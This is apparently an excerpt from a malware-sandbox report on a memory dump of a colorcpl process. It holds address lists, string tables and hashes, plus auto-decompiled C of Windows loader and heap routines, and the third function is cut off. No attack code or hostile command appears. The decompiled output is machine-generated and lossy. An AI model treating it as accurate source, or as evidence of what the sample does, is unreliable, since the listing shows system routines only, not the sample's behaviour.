0x0433f451
0x0433f451
0x0433f406
0x0433f36b
0x0433f37a
0x0433f37f
0x0433f384
0x0433f389
0x0433f38b
0x0439e06d
0x0433f391
0x0433f391
0x0433f391
0x0433f393
0x0433f396
0x0439e077
0x0439e080
0x0439e086
0x0439e091
0x0439e093
0x0439e09e
0x0439e09e
0x0439e09e
0x0439e0bb
0x0439e0bb
0x0439e086
0x0433f39c
0x0433f3a1
0x0433f3a6
0x0433f3a8
0x0439e0ce
0x0433f3ae
0x0433f3ae
0x0433f3ae
0x0433f3b0
0x0433f3b3
0x00000000
0x0433f3b9
0x0439e0dd
0x0439e0df
0x0439df70
0x0439df70
0x0439df70
0x0439df79
0x0439df7a
0x0439df7b
0x00000000
0x0439df7b
0x0433f3b3
0x0433f306
0x0433f31a
0x0433f31f
0x0433f321
0x00000000
0x00000000
0x0433f327
0x0433f32c
0x0433f32e
0x0439dfaf
0x0433f334
0x0433f334
0x0433f334
0x0433f339
0x0433f33c
0x0439dfb9
0x0439dfc2
0x0439dfc8
0x0439dfda
0x0439dfda
0x0439dfc8
0x0433f342
0x00000000
0x0433f342
0x0433f2f9
0x0433f2fc
0x0433f3d0
0x0433f3d2
0x00000000
0x00000000
0x0433f3d8
0x0433f3db
0x00000000
0x0433f3e1
0x00000000
0x0433f3e1
0x0433f3db
0x00000000
0x0433f2fc
0x0433f14a
0x0433f150
0x0439dc6e
0x00000000
0x0439dc6e
0x0433f159
0x0433f15b
0x0433f162
0x0433f1d0
0x00000000
0x0433f17b
0x0433f184
0x0433f189
0x0433f18c
0x0433f18e
0x0433f19e
0x00000000
0x0433f1a0
0x0433f1a3
0x0433f1b1
0x0433f1ba
0x0433f1be
0x0433f1c5
0x0433f1dc
0x0433f1e4
0x0433f1e9
0x0433f1eb
0x0433f1ef
0x0433f1f4
0x0433f1fa
0x0433f1fa
0x0433f1eb
0x00000000
0x0433f1c5
0x0433f19e

Strings

(LONG)FreeEntry->Size > 1, xrefs: 0439E020
(!TrailingUCR), xrefs: 0439E138
HEAP: , xrefs: 0439DCF3, 0439DE37, 0439E015, 0439E12D
((LONG)FreeEntry->Size > 1), xrefs: 0439DE42
(UCRBlock != NULL), xrefs: 0439DCFE
HEAP[%wZ]: , xrefs: 0439DCE6, 0439DE2A, 0439E008, 0439E120

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 339714dd8bf801fdc733f6a2b029bf651bf147d9a7613b431006f63e5a4303c4
Instruction ID: 36b31cf1746deaa4e5cd6c9a7446cfea2398f13c7cdc306a4576d35884a6749c
Opcode Fuzzy Hash: 339714dd8bf801fdc733f6a2b029bf651bf147d9a7613b431006f63e5a4303c4
Instruction Fuzzy Hash: 9442DF31A087819FDB15CF28C484B2ABBE5FF88709F446969E8968B791E734FC41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0435B0D0 Relevance: 7.8, Strings: 6, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0435B0D0(signed short* __ecx, signed short* __edx, signed int _a4, signed int* _a8) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed short* _v12;
				char _v16;
				signed int _v20;
				char _v28;
				char _v36;
				char _v44;
				signed int _t75;
				char* _t76;
				signed int _t79;
				signed short* _t81;
				signed short* _t89;
				short* _t93;
				signed short* _t96;
				signed int _t97;
				signed int _t103;
				signed int _t112;
				void* _t119;
				char _t128;
				signed int _t134;
				signed short* _t135;
				signed int _t136;
				signed int* _t138;
				signed int _t140;
				signed short _t141;
				void* _t144;
				signed short _t145;
				signed int _t146;
				signed int _t151;
				signed short* _t161;
				signed short _t165;
				signed short _t168;
				signed short* _t183;
				signed int _t184;
				signed int _t186;
				void* _t189;

				_t135 = __ecx;
				_t183 = __edx;
				_v12 = __ecx;
				if(E0435C4A0(0,  &_v16) < 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				_t138 = _a8;
				_t75 = 0;
				_t184 = 0;
				_v5 = 0;
				if(( *_t138 & 0x00800008) != 0) {
					L16:
					_v12 = _t135;
					if( *_t183 != 0) {
						__eflags =  *0x44337c0 & 0x00000005;
						if(( *0x44337c0 & 0x00000005) != 0) {
							__eflags = _t75;
							_t76 = "SxS";
							if(_t75 == 0) {
								_t76 = "API set";
							}
							_push(_t76);
							_push(_t183);
							E043BE692("minkernel\\ntdll\\ldrutil.c", 0xa78, "LdrpPreprocessDllName", 2, "DLL %wZ was redirected to %wZ by %s\n", _t135);
							_t138 = _a8;
							_t189 = _t189 + 0x20;
						}
						_t79 =  *_t138 | 0x00000200;
						__eflags = _v5;
						 *_t138 = _t79;
						if(_v5 != 0) {
							 *_t138 = _t79 | 0x00000004;
						}
						_t81 = _t183;
						_v12 = _t81;
						L27:
						if(_t184 < 0) {
							goto L83;
						}
						if(( *_t138 & 0x00000200) != 0) {
							E0434FCF0(_t138, _t183);
							_t81 = _v12;
						}
						_t165 = _t81[2];
						_t89 = ( *_t81 & 0x0000ffff) + 0xfffffffe + _t165;
						if(_t89 < _t165) {
							L34:
							_t184 = E0435C7E7(_t183, 0x431116c);
							goto L39;
						} else {
							while(1) {
								_t140 =  *_t89 & 0x0000ffff;
								if(_t140 == 0x2e) {
									break;
								}
								if(_t140 != 0x2f && _t140 != 0x5c) {
									_t89 = _t89 - 2;
									if(_t89 >= _t165) {
										continue;
									}
								}
								goto L34;
							}
							_t141 = _t183[2];
							_t93 = ( *_t183 & 0x0000ffff) + 0xfffffffe + _t141;
							__eflags = _t93 - _t141;
							if(_t93 < _t141) {
								L38:
								__eflags = 0;
								 *((short*)(_t93 + 2)) = 0;
								L39:
								if(_t184 < 0) {
									goto L83;
								}
								goto L40;
							}
							while(1) {
								__eflags =  *_t93 - 0x2e;
								if( *_t93 != 0x2e) {
									goto L38;
								}
								_t93 = _t93 - 2;
								 *_t183 =  *_t183 + 0xfffe;
								__eflags = _t93 - _t141;
								if(_t93 >= _t141) {
									continue;
								}
								goto L38;
							}
							goto L38;
						}
					}
					_t168 = _t135[2];
					_t96 = ( *_t135 & 0x0000ffff) + 0xfffffffe + _t168;
					if(_t96 < _t168) {
						L22:
						 *_t138 =  *_t138 | 0x00000020;
						_t184 = 0;
						_t97 =  *_t135 & 0x0000ffff;
						if(_t97 == 0) {
							L26:
							_t81 = _t135;
							goto L27;
						}
						_t144 = _t97 + ( *_t183 & 0x0000ffff) + 2;
						if(_t144 > (_t183[1] & 0x0000ffff)) {
							__eflags = _t144 - 0xfffe;
							if(_t144 <= 0xfffe) {
								_t62 = _t144 + 0x3f; // -191
								_t186 = _t62 & 0xffffffc0;
								__eflags = _t186 - 0xfffe;
								if(_t186 > 0xfffe) {
									_t186 = 0xfffe;
								}
								_t145 = _t183[2];
								_t64 =  &(_t183[4]); // 0x1000008
								__eflags = _t145 - _t64;
								if(_t145 == _t64) {
									_t146 = E04355D60(_t186);
									_v20 = _t146;
									__eflags = _t146;
									if(_t146 == 0) {
										goto L80;
									}
									_t103 =  *_t183 & 0x0000ffff;
									__eflags = _t103;
									if(_t103 != 0) {
										E043888C0(_t146, _t183[2], _t103);
										_t146 = _v20;
										_t189 = _t189 + 0xc;
									}
									goto L78;
								} else {
									_t146 = E043C3C57(_t186, _t145);
									L78:
									__eflags = _t146;
									if(_t146 == 0) {
										L80:
										_t184 = 0xc0000017;
										L25:
										_t138 = _a8;
										goto L26;
									}
									_t183[2] = _t146;
									_t183[1] = _t186;
									goto L24;
								}
							}
							_t184 = 0xc0000106;
							goto L25;
						}
						L24:
						_t184 = 0;
						E043888C0(( *_t183 & 0x0000ffff) + _t183[2], _t135[2],  *_t135 & 0x0000ffff);
						_t189 = _t189 + 0xc;
						 *_t183 =  *_t183 + ( *_t135 & 0x0000ffff);
						 *((short*)(_t183[2] + (( *_t183 & 0x0000ffff) >> 1) * 2)) = 0;
						goto L25;
					} else {
						goto L18;
					}
					while(1) {
						L18:
						_t151 =  *_t96 & 0x0000ffff;
						if(_t151 == 0x5c || _t151 == 0x2f) {
							break;
						}
						_t96 = _t96 - 2;
						if(_t96 >= _t168) {
							continue;
						}
						_t138 = _a8;
						goto L22;
					}
					__eflags = L0437432E(_t135) - 5;
					if(__eflags == 0) {
						_t184 = E0435C7E7(_t183, _t135);
						goto L25;
					}
					_t112 = E043623C4(_t135, _t183, __eflags);
					_t138 = _a8;
					_t184 = _t112;
					_t81 = _t135;
					__eflags = _t184;
					if(_t184 < 0) {
						goto L83;
					}
					 *_t138 =  *_t138 | 0x00000600;
					goto L27;
				} else {
					_v5 = 0;
					_v20 =  *[fs:0x30];
					_v7 = 1;
					E0435DF36(0, _t135, 0x14d0);
					asm("sbb edx, edx");
					if(E0436015C( *((intOrPtr*)( *[fs:0x30] + 0x38)), _t135,  ~_a4 & _a4 + 0x0000002c,  &_v6,  &_v28) < 0 || _v6 == 0) {
						_t119 = 0x14d3;
					} else {
						__eflags = _v28;
						if(_v28 == 0) {
							_t119 = 0x14d2;
						} else {
							_t119 = 0x14d1;
						}
					}
					E0435DF36(0, _t135, _t119);
					if(_v6 != 0) {
						__eflags = _v28;
						if(_v28 == 0) {
							_t184 = 0xc0000481;
							goto L14;
						}
						 *_t183 = 0;
						E04385050(0,  &_v44, E043501C0());
						E0435C7E7(_t183,  &_v44);
						E0435C7E7(_t183, 0x4311008);
						_t184 = E0435C7E7(_t183,  &_v28);
						__eflags = _t184;
						if(_t184 < 0) {
							goto L7;
						}
						_t134 =  *(_v20 + 0x10);
						__eflags = _t134;
						if(_t134 == 0) {
							L53:
							_t128 = 0;
							__eflags = 0;
							L54:
							_t161 = _t183;
							goto L8;
						}
						__eflags =  *(_t134 + 8) & 0x00001000;
						if(( *(_t134 + 8) & 0x00001000) != 0) {
							_t128 = 1;
							goto L54;
						}
						goto L53;
					} else {
						L7:
						_t128 = _v7;
						_t161 = _t135;
						L8:
						if(_t184 < 0) {
							L83:
							__eflags =  *0x44337c0 & 0x00000003;
							if(( *0x44337c0 & 0x00000003) != 0) {
								_push(_t184);
								E043BE692("minkernel\\ntdll\\ldrutil.c", 0xab2, "LdrpPreprocessDllName", 0, "LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx\n", _t135);
							}
							__eflags =  *0x44337c0 & 0x00000010;
							if(( *0x44337c0 & 0x00000010) != 0) {
								asm("int3");
							}
							L40:
							if(_v8 != 0) {
								E0435C4A0(_v16,  &_v16);
							}
							return _t184;
						} else {
							if(_t128 != 0 &&  *0x4435d70 == 0) {
								_t136 = E04359870(1, _t161, 0x431116c, 0,  &_v36, 0, 0, 0, 0);
								if(_t136 >= 0) {
									_v5 = 1;
									E043623C4( &_v36, _t183, __eflags);
									E0436E3C9( &_v36);
								}
								if(_t136 != 0xc0150008) {
									_t184 = _t136;
								}
								_t135 = _v12;
							}
							L14:
							if(_t184 < 0) {
								goto L83;
							} else {
								_t138 = _a8;
								_t75 = _v5;
								goto L16;
							}
						}
					}
				}
			}

0x0435b0de
0x0435b0e3
0x0435b0e5
0x0435b0ef
0x043a81db
0x0435b0f5
0x0435b0f5
0x0435b0f5
0x0435b0f9
0x0435b0fc
0x0435b0fe
0x0435b100
0x0435b109
0x0435b1d5
0x0435b1d9
0x0435b1dc
0x0435b303
0x0435b30a
0x043a81f8
0x043a81fa
0x043a81ff
0x043a8201
0x043a8201
0x043a8206
0x043a8207
0x043a821f
0x043a8224
0x043a8227
0x043a8227
0x0435b312
0x0435b317
0x0435b31b
0x0435b31d
0x0435b3ff
0x0435b3ff
0x0435b323
0x0435b325
0x0435b264
0x0435b266
0x00000000
0x00000000
0x0435b272
0x0435b2f6
0x0435b2fb
0x0435b2fb
0x0435b278
0x0435b281
0x0435b285
0x0435b2a0
0x0435b2ac
0x00000000
0x0435b287
0x0435b287
0x0435b287
0x0435b28d
0x00000000
0x00000000
0x0435b292
0x0435b299
0x0435b29e
0x00000000
0x00000000
0x0435b29e
0x00000000
0x0435b292
0x0435b2b3
0x0435b2b9
0x0435b2bb
0x0435b2bd
0x0435b2ca
0x0435b2ca
0x0435b2cc
0x0435b2d0
0x0435b2d2
0x00000000
0x00000000
0x00000000
0x0435b2d2
0x0435b2c0
0x0435b2c0
0x0435b2c4
0x00000000
0x00000000
0x043a82bf
0x043a82c2
0x043a82c5
0x043a82c7
0x00000000
0x00000000
0x00000000
0x043a82cd
0x00000000
0x0435b2c0
0x0435b285
0x0435b1e5
0x0435b1eb
0x0435b1ef
0x0435b210
0x0435b210
0x0435b213
0x0435b215
0x0435b21b
0x0435b262
0x0435b262
0x00000000
0x0435b262
0x0435b225
0x0435b22d
0x043a823f
0x043a8245
0x043a8251
0x043a8254
0x043a8257
0x043a825d
0x043a825f
0x043a825f
0x043a8264
0x043a8267
0x043a826a
0x043a826c
0x043a827f
0x043a8281
0x043a8284
0x043a8286
0x00000000
0x00000000
0x043a8288
0x043a828b
0x043a828e
0x043a8295
0x043a829a
0x043a829d
0x043a829d
0x00000000
0x043a826e
0x043a8275
0x043a82a0
0x043a82a0
0x043a82a2
0x043a82b0
0x043a82b0
0x0435b25f
0x0435b25f
0x00000000
0x0435b25f
0x043a82a4
0x043a82a7
0x00000000
0x043a82a7
0x043a826c
0x043a8247
0x00000000
0x043a8247
0x0435b233
0x0435b236
0x0435b243
0x0435b24b
0x0435b24e
0x0435b25b
0x00000000
0x00000000
0x00000000
0x00000000
0x0435b1f1
0x0435b1f1
0x0435b1f1
0x0435b1f7
0x00000000
0x00000000
0x0435b206
0x0435b20b
0x00000000
0x00000000
0x0435b20d
0x00000000
0x0435b20d
0x0435b3ae
0x0435b3b1
0x043a8238
0x00000000
0x043a8238
0x0435b3bb
0x0435b3c0
0x0435b3c3
0x0435b3c5
0x0435b3c7
0x0435b3c9
0x00000000
0x00000000
0x0435b3cf
0x00000000
0x0435b10f
0x0435b117
0x0435b123
0x0435b129
0x0435b12d
0x0435b144
0x0435b154
0x0435b160
0x0435b32d
0x0435b32d
0x0435b332
0x043a81e4
0x0435b338
0x0435b338
0x0435b338
0x0435b332
0x0435b16a
0x0435b173
0x0435b342
0x0435b347
0x043a81ee
0x00000000
0x043a81ee
0x0435b34f
0x0435b35c
0x0435b366
0x0435b372
0x0435b381
0x0435b383
0x0435b385
0x00000000
0x00000000
0x0435b38e
0x0435b391
0x0435b393
0x0435b39e
0x0435b39e
0x0435b39e
0x0435b3a0
0x0435b3a0
0x00000000
0x0435b3a0
0x0435b395
0x0435b39c
0x0435b406
0x00000000
0x0435b406
0x00000000
0x0435b179
0x0435b179
0x0435b179
0x0435b17c
0x0435b17e
0x0435b180
0x043a82d2
0x043a82d2
0x043a82d9
0x043a82db
0x043a82f3
0x043a82f8
0x043a82fb
0x043a8302
0x043a8308
0x043a8308
0x0435b2d8
0x0435b2dc
0x0435b2e5
0x0435b2e5
0x0435b2f2
0x0435b186
0x0435b188
0x0435b1ae
0x0435b1b2
0x0435b3dc
0x0435b3e3
0x0435b3eb
0x0435b3eb
0x0435b1be
0x0435b3f5
0x0435b3f5
0x0435b1c4
0x0435b1c4
0x0435b1c7
0x0435b1c9
0x00000000
0x0435b1cf
0x0435b1cf
0x0435b1d2
0x00000000
0x0435b1d2
0x0435b1c9
0x0435b180
0x0435b173

Strings

minkernel\ntdll\ldrutil.c, xrefs: 043A821A, 043A82EE
API set, xrefs: 043A8201, 043A8206
DLL %wZ was redirected to %wZ by %s, xrefs: 043A8209
SxS, xrefs: 043A81FA
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 043A82DD
LdrpPreprocessDllName, xrefs: 043A8210, 043A82E4

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 6dea8463da693fd2b51f8d47ac72c3c55c090844b197772ce4951af4ed6e5704
Instruction ID: c5b205d0969e9ed871cf390927536996005ed15793a1d67bedf9594e98b3e224
Opcode Fuzzy Hash: 6dea8463da693fd2b51f8d47ac72c3c55c090844b197772ce4951af4ed6e5704
Instruction Fuzzy Hash: B4C12931B006159BEB28AF64C881FBEF765EF45708F14A169DC12AB6A0E774FD54C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 043EF0A5 Relevance: 7.7, Strings: 6, Instructions: 231
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E043EF0A5(void* __ebx, signed int* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				signed char _t105;
				signed int _t106;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t116;
				short* _t134;
				short _t135;
				signed char _t153;
				signed int* _t158;
				short* _t169;
				signed int _t174;
				signed int _t184;
				signed int _t185;
				intOrPtr* _t190;
				void* _t191;

				_push(0x3c);
				_push(0x441d320);
				E04397BE4(__ebx, __edi, __esi);
				_t188 = __ecx;
				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
				 *((char*)(_t191 - 0x19)) = 0;
				 *(_t191 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *(_t191 - 4) = 0;
					 *(_t191 - 4) = 1;
					_t87 = E04337662("RtlAllocateHeap");
					__eflags = _t87;
					if(_t87 == 0) {
						L46:
						 *(_t191 - 0x24) = 0;
						L47:
						 *(_t191 - 4) = 0;
						 *(_t191 - 4) = 0xfffffffe;
						E043EF3F9();
						_t89 =  *(_t191 - 0x24);
						goto L48;
					}
					_t153 =  *(__ecx + 0x44) | __edx;
					 *(_t191 - 0x2c) = _t153;
					_t183 = _t153 | 0x10000100;
					 *(_t191 - 0x34) = _t153 | 0x10000100;
					_t174 =  *(_t191 + 8);
					__eflags = _t174;
					 *(_t191 - 0x20) = _t174;
					if(_t174 == 0) {
						 *(_t191 - 0x20) = 1;
					}
					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
					__eflags = _t92 - 0x10;
					if(_t92 < 0x10) {
						_t92 = 0x10;
					}
					_t93 = _t92 + 8;
					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
					__eflags = _t93 - _t174;
					if(_t93 < _t174) {
						L42:
						_t94 =  *[fs:0x30];
						__eflags =  *(_t94 + 0xc);
						if( *(_t94 + 0xc) == 0) {
							_push("HEAP: ");
							E0433B910();
						} else {
							E0433B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t188 + 0x78)));
						E0433B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
						goto L46;
					} else {
						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
							goto L42;
						}
						__eflags = _t153 & 0x00000001;
						if((_t153 & 0x00000001) == 0) {
							E0434FED0( *((intOrPtr*)(_t188 + 0xc8)));
							 *((char*)(_t191 - 0x19)) = 1;
							_t183 =  *(_t191 - 0x2c) | 0x10000101;
							__eflags = _t183;
							 *(_t191 - 0x34) = _t183;
						}
						E043F0835(_t188, 0);
						_t184 = E04355D90(_t188, _t188, _t183,  *(_t191 + 8));
						 *(_t191 - 0x24) = _t184;
						_t176 = 1;
						E043F0D24(_t188);
						__eflags = _t184;
						if(_t184 == 0) {
							goto L47;
						} else {
							_t185 = _t184 + 0xfffffff8;
							__eflags =  *((char*)(_t185 + 7)) - 5;
							if( *((char*)(_t185 + 7)) == 5) {
								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
								__eflags = _t185;
							}
							_t158 = _t185;
							 *(_t191 - 0x38) = _t185;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
								if(__eflags != 0) {
									_push(_t158);
									_t176 = _t185;
									E043FD646(0, _t188, _t185, _t185, _t188, __eflags);
								}
							}
							__eflags =  *(_t185 + 2) & 0x00000002;
							if(( *(_t185 + 2) & 0x00000002) == 0) {
								_t105 =  *(_t185 + 3);
								 *(_t191 - 0x1a) = _t105;
								_t106 = _t105 & 0x000000ff;
							} else {
								_t134 = E04373AE9(_t185);
								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
								__eflags =  *(_t188 + 0x40) & 0x08000000;
								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
									 *_t134 = 0;
								} else {
									_t135 = E0436FDB9(1, _t176);
									_t169 =  *((intOrPtr*)(_t191 - 0x28));
									 *_t169 = _t135;
									_t134 = _t169;
								}
								_t45 = _t134 + 2; // 0xffff
								_t106 =  *_t45 & 0x0000ffff;
							}
							 *(_t191 - 0x2c) = _t106;
							 *(_t191 - 0x20) = _t106;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *_t185;
							}
							__eflags =  *(_t188 + 0x40) & 0x20000000;
							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E043F0835(_t188, 0);
							}
							__eflags =  *(_t191 - 0x24) -  *0x44347c0; // 0x0
							_t108 =  *[fs:0x30];
							if(__eflags != 0) {
								_t109 =  *(_t108 + 0x68);
								 *(_t191 - 0x44) = _t109;
								__eflags = _t109 & 0x00000800;
								if((_t109 & 0x00000800) == 0) {
									goto L47;
								}
								_t110 =  *(_t191 - 0x2c);
								__eflags = _t110;
								if(_t110 == 0) {
									goto L47;
								}
								__eflags = _t110 -  *0x44347c4; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x44347c6; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								_t112 =  *[fs:0x30];
								__eflags =  *(_t112 + 0xc);
								if( *(_t112 + 0xc) == 0) {
									_push("HEAP: ");
									E0433B910();
								} else {
									E0433B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E043E823A(_t188,  *(_t191 - 0x20)));
								_push( *(_t191 + 8));
								E0433B910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
								goto L32;
							} else {
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E0433B910();
								} else {
									E0433B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t191 + 8));
								E0433B910("Just allocated block at %p for %Ix bytes\n",  *0x44347c0);
								L32:
								_t116 =  *[fs:0x30];
								__eflags =  *((char*)(_t116 + 2));
								if( *((char*)(_t116 + 2)) != 0) {
									 *0x44347a1 = 1;
									 *0x4434100 = 0;
									asm("int3");
									 *0x44347a1 = 0;
								}
								goto L47;
							}
						}
					}
				} else {
					_t190 =  *0x4433748; // 0x0
					 *0x44391e0(__ecx, __edx,  *(_t191 + 8));
					_t89 =  *_t190();
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
					return _t89;
				}
			}

0x043ef0a5
0x043ef0a7
0x043ef0ac
0x043ef0b3
0x043ef0b5
0x043ef0ba
0x043ef0bd
0x043ef0c7
0x043ef0e3
0x043ef0e6
0x043ef0f4
0x043ef0f9
0x043ef0fb
0x043ef3d2
0x043ef3d2
0x043ef3d5
0x043ef3d5
0x043ef3d8
0x043ef3df
0x043ef3e4
0x00000000
0x043ef3e4
0x043ef104
0x043ef106
0x043ef10b
0x043ef111
0x043ef114
0x043ef117
0x043ef119
0x043ef11c
0x043ef11e
0x043ef11e
0x043ef12e
0x043ef134
0x043ef137
0x043ef13b
0x043ef13b
0x043ef13c
0x043ef13f
0x043ef142
0x043ef144
0x043ef350
0x043ef350
0x043ef356
0x043ef359
0x043ef378
0x043ef37d
0x043ef35b
0x043ef370
0x043ef375
0x043ef383
0x043ef38e
0x00000000
0x043ef14a
0x043ef14a
0x043ef14d
0x00000000
0x00000000
0x043ef153
0x043ef156
0x043ef15e
0x043ef163
0x043ef16a
0x043ef16a
0x043ef170
0x043ef170
0x043ef177
0x043ef186
0x043ef188
0x043ef18b
0x043ef18f
0x043ef194
0x043ef196
0x00000000
0x043ef19c
0x043ef19c
0x043ef19f
0x043ef1a3
0x043ef1ac
0x043ef1ac
0x043ef1ac
0x043ef1ae
0x043ef1b0
0x043ef1b3
0x043ef1b6
0x043ef1bb
0x043ef1c5
0x043ef1c8
0x043ef1ca
0x043ef1cb
0x043ef1cf
0x043ef1cf
0x043ef1c8
0x043ef1d4
0x043ef1d8
0x043ef208
0x043ef20b
0x043ef20e
0x043ef1da
0x043ef1dc
0x043ef1e1
0x043ef1e6
0x043ef1ed
0x043ef1ff
0x043ef1ef
0x043ef1f0
0x043ef1f5
0x043ef1f8
0x043ef1fb
0x043ef1fb
0x043ef202
0x043ef202
0x043ef202
0x043ef211
0x043ef214
0x043ef218
0x043ef21b
0x043ef227
0x043ef22d
0x043ef22d
0x043ef22d
0x043ef22f
0x043ef236
0x043ef238
0x043ef23c
0x043ef23c
0x043ef244
0x043ef24a
0x043ef250
0x043ef2be
0x043ef2c1
0x043ef2c4
0x043ef2c9
0x00000000
0x00000000
0x043ef2cf
0x043ef2d2
0x043ef2d5
0x00000000
0x00000000
0x043ef2db
0x043ef2e2
0x00000000
0x00000000
0x043ef2ec
0x043ef2f3
0x00000000
0x00000000
0x043ef2f9
0x043ef2ff
0x043ef302
0x043ef321
0x043ef326
0x043ef304
0x043ef319
0x043ef31e
0x043ef337
0x043ef338
0x043ef343
0x00000000
0x043ef252
0x043ef252
0x043ef255
0x043ef274
0x043ef279
0x043ef257
0x043ef26c
0x043ef271
0x043ef27f
0x043ef28d
0x043ef295
0x043ef295
0x043ef29b
0x043ef29f
0x043ef2a5
0x043ef2ac
0x043ef2b2
0x043ef2b3
0x043ef2b3
0x00000000
0x043ef29f
0x043ef250
0x043ef196
0x043ef0c9
0x043ef0ce
0x043ef0d6
0x043ef0dc
0x043ef3e7
0x043ef3ea
0x043ef3f6
0x043ef3f6

Strings

HEAP: , xrefs: 043EF274, 043EF321, 043EF378
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 043EF389
HEAP[%wZ]: , xrefs: 043EF267, 043EF314, 043EF36B
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 043EF33E
Just allocated block at %p for %Ix bytes, xrefs: 043EF288
RtlAllocateHeap, xrefs: 043EF0ED

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: 1ff4164d4271c7fcb6a3c96ce90a738f1a922353856871c88342a5361e5ae8f3
Instruction ID: e28a00599e12a36f6db25f23fa7ced5467cc281bbff4c5169924b117e276b5e0
Opcode Fuzzy Hash: 1ff4164d4271c7fcb6a3c96ce90a738f1a922353856871c88342a5361e5ae8f3
Instruction Fuzzy Hash: 4C912435A01654EFEB15DFAAC440ABDBBF2FF49714F04A059E445AB292C7B6B940CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0433640D Relevance: 7.6, Strings: 6, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0433640D(void* __ecx) {
				signed int _v8;
				void* _v12;
				void* _v536;
				void* _v548;
				char _v780;
				char* _v784;
				char _v788;
				char _v792;
				intOrPtr _v804;
				char _v868;
				char* _v872;
				short _v874;
				char _v876;
				void* _v880;
				char _v892;
				void* _v896;
				void* _v900;
				void* _v904;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t48;
				short _t49;
				void* _t52;
				signed char _t61;
				void* _t67;
				intOrPtr _t71;
				void* _t81;
				signed char _t85;
				void* _t99;
				void* _t100;
